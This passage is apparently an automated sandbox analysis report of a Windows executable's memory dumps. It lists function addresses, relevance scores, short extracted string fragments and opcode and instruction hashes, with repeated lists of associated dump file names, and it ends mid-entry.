                                                                        • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                        • Instruction ID: ab18970fc5f24924bb87dafdae60017821d93ca90765c3e2efa3d198e376b3fb
                                                                        • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                        • Instruction Fuzzy Hash: C971D26110C3C28BD316CB2A84A037BFFE1DFA7305F19499EE4D65B282D779890AC752
                                                                        Function 003C0870 Relevance: 5.9, Strings: 4, Instructions: 861COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +2/?$=79$BBSH$GZE^
                                                                        • API String ID: 0-3392023846
                                                                        • Opcode ID: b987680c66a2679e5cf3341a779c1b9ed145f0f0c3b56f07e33c0fb6698343db
                                                                        • Instruction ID: cbac6976022771a24ff990fdbb6c10ff58a4a54578fc9dafd37529768272363f
                                                                        • Opcode Fuzzy Hash: b987680c66a2679e5cf3341a779c1b9ed145f0f0c3b56f07e33c0fb6698343db
                                                                        • Instruction Fuzzy Hash: 3E52D271504B818FC736CF39C890B66BBE1BF56314F188A6DD4E68BB92C735A806CB51
                                                                        Function 003AB210 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: H{D}$TgXy$_o]a$=>?
                                                                        • API String ID: 0-2004217480
                                                                        • Opcode ID: fa5d95c9aada6a85721004688f8cc91567fb9940276ad451cea5326e84941ae2
                                                                        • Instruction ID: eafbecf16b2d9065a8534ef49d58fea5ddd1156780fedc104fd1896d443d5e06
                                                                        • Opcode Fuzzy Hash: fa5d95c9aada6a85721004688f8cc91567fb9940276ad451cea5326e84941ae2
                                                                        • Instruction Fuzzy Hash: 1E1256B1210B41CFD3358F26D895B97BBF9FB45314F148A2DD5AA8BAA0CB74A405CF80
                                                                        Function 003C7E20 Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =:;8$=:;8$a{$kp
                                                                        • API String ID: 0-2717198472
                                                                        • Opcode ID: f96e5439cc563ce49f9c1178c9000a694694ebb9a3ea0b4a8f48d434a3f162df
                                                                        • Instruction ID: 2c57a9b2a75033e96579ad14aff59efd9098a15d5f46bf061b84e5c120b51fc7
                                                                        • Opcode Fuzzy Hash: f96e5439cc563ce49f9c1178c9000a694694ebb9a3ea0b4a8f48d434a3f162df
                                                                        • Instruction Fuzzy Hash: CDE1DFB550C381DFE325DF64E881B6BBBE9FBC5304F18892CE5858B291EB749905CB42
                                                                        Function 003AAD00 Relevance: 5.4, Strings: 4, Instructions: 424COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @A$lPLN$svfZ$IK
                                                                        • API String ID: 0-1806543684
                                                                        • Opcode ID: da5a9e81b7727f3a1b46df063e88d025b2ccc081d094e8944f00dfb33906dbd9
                                                                        • Instruction ID: d9684da33ea430666ca1a7d0574deedea249f0f03ae187048973264a9070fe54
                                                                        • Opcode Fuzzy Hash: da5a9e81b7727f3a1b46df063e88d025b2ccc081d094e8944f00dfb33906dbd9
                                                                        • Instruction Fuzzy Hash: CEC1F67264C3848BD3258E6494A136FFBE2EBC3710F19C92DE4E54B386D7758C099B82
                                                                        Function 003C5E90 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @J$KP$VD$ra<
                                                                        • API String ID: 0-4095681229
                                                                        • Opcode ID: fa6e3cf809b95b3f4aa3e5ac184ecb0f014b4a21a96ebb7fa4eefc794d1af108
                                                                        • Instruction ID: e573c9e75b88f3f653b9c14e0c8acd82dc062dac90c7e34ce12f7604ab160117
                                                                        • Opcode Fuzzy Hash: fa6e3cf809b95b3f4aa3e5ac184ecb0f014b4a21a96ebb7fa4eefc794d1af108
                                                                        • Instruction Fuzzy Hash: 5A9164B1704B459FE721CF64DC81BABBBB5FB82310F14462CE5959B781C374A816CB92
                                                                        Function 003A4040 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$)$IEND
                                                                        • API String ID: 0-588110143
                                                                        • Opcode ID: 66acb745b08ec0bea1bd199fe06857066bbca89f9ebb58a38b82ac8016beb0b5
                                                                        • Instruction ID: 9054a9413fcac706fcf3f2d6e0773dba357a46ad3dd45a342acdea091a550207
                                                                        • Opcode Fuzzy Hash: 66acb745b08ec0bea1bd199fe06857066bbca89f9ebb58a38b82ac8016beb0b5
                                                                        • Instruction Fuzzy Hash: 22F101B1A087419BE315CF28D89176BBBE4FB96304F044A2DF9959B3D1D7B4E814CB82
                                                                        Function 005738E9 Relevance: 4.1, Strings: 2, Instructions: 1646COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N8G)$S66w
                                                                        • API String ID: 0-2367446714
                                                                        • Opcode ID: e43f4bf0bfadba27c724213c8a6defc8716eebc6099186bf285ce69c271693d8
                                                                        • Instruction ID: e8c54ba6c6cad3251e6ae53d36d27333eb315dbc9193e9b64350661e3736a1c3
                                                                        • Opcode Fuzzy Hash: e43f4bf0bfadba27c724213c8a6defc8716eebc6099186bf285ce69c271693d8
                                                                        • Instruction Fuzzy Hash: 8FB23BF3A082149FE314AE2DEC8567AFBE9EFD4720F16853DEAC4C7744E93558018692
                                                                        Function 003AC02B Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PQ$A_$IG
                                                                        • API String ID: 0-2179527320
                                                                        • Opcode ID: 04e23809b1518e1309047a70b8ff08d79dddda56db74b83b4e68e39326d1b545
                                                                        • Instruction ID: 45bdd016102c5d99165b2e6c80545f2c90918d0385f914133e691c78a6ccad7f
                                                                        • Opcode Fuzzy Hash: 04e23809b1518e1309047a70b8ff08d79dddda56db74b83b4e68e39326d1b545
                                                                        • Instruction Fuzzy Hash: A441BBB001C341CBC716CF21D89266BB7F0FF96758F24AA0DE0C19B691E7748946CB4A
                                                                        Function 003DC040 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: f$
                                                                        • API String ID: 2994545307-508322865
                                                                        • Opcode ID: bcb632d643a1edfb2773f6895e020fd88ae8ac96d7ea20126c57280b22bf4f64
                                                                        • Instruction ID: afa7ed5b321e870152c64044c306ba1c9b4d00e4ea5ddbf6fef79c98038ebf40
                                                                        • Opcode Fuzzy Hash: bcb632d643a1edfb2773f6895e020fd88ae8ac96d7ea20126c57280b22bf4f64
                                                                        • Instruction Fuzzy Hash: 881216716283429FD716CF29D880A2BBBE5FBC5314F299A2EE59587392C331DC41CB52
                                                                        Function 003D24E0 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 003D2591
                                                                        • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 003D25D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                        • API String ID: 0-2492670020
                                                                        • Opcode ID: 73398e8911815bdb619166d0213a530fbc748cd4bdc3f5b8ab6a90ba560f6cae
                                                                        • Instruction ID: 0e0c4a30c5910c259f2b4bfcd72bc483f982396f17ad5b39a9b99e9f28b9d506
                                                                        • Opcode Fuzzy Hash: 73398e8911815bdb619166d0213a530fbc748cd4bdc3f5b8ab6a90ba560f6cae
                                                                        • Instruction Fuzzy Hash: 54813C33A086914BCB268D3CAC912EBBB975F67330F2D83AAD5719B3D5D12589058351
                                                                        Function 0040830B Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,,OW$4Zx]
                                                                        • API String ID: 0-1472379964
                                                                        • Opcode ID: 9ef94850319525b4787a9c9703261c95d74f7b08e12d100f16dfc06e5909e7c5
                                                                        • Instruction ID: aed1b1e39ede85be442d2a8b1e7e434bd84aa2e665fb1f395421fc185b43afd9
                                                                        • Opcode Fuzzy Hash: 9ef94850319525b4787a9c9703261c95d74f7b08e12d100f16dfc06e5909e7c5
                                                                        • Instruction Fuzzy Hash: CB5149F3A583095BF3049D78EC857367AC6DBD4320F2A4639AB49CB7C9F8799C054249
                                                                        Function 0050B18F Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !|sW$Zk??
                                                                        • API String ID: 0-2126295466
                                                                        • Opcode ID: 4515cedc11ec9d331c198edaa8093b5d93f03b3ba958ed1666de6ae3db28c0f4
                                                                        • Instruction ID: 4e432f02c18b4481b93ba4284f0d2dbca058614d19e95556e147446e7fe302ab
                                                                        • Opcode Fuzzy Hash: 4515cedc11ec9d331c198edaa8093b5d93f03b3ba958ed1666de6ae3db28c0f4
                                                                        • Instruction Fuzzy Hash: 7F4126F3D483149FE310AE6CECC5756BAD4EB18320F1A4638DFD893784E97858048682
                                                                        Function 003AE970 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
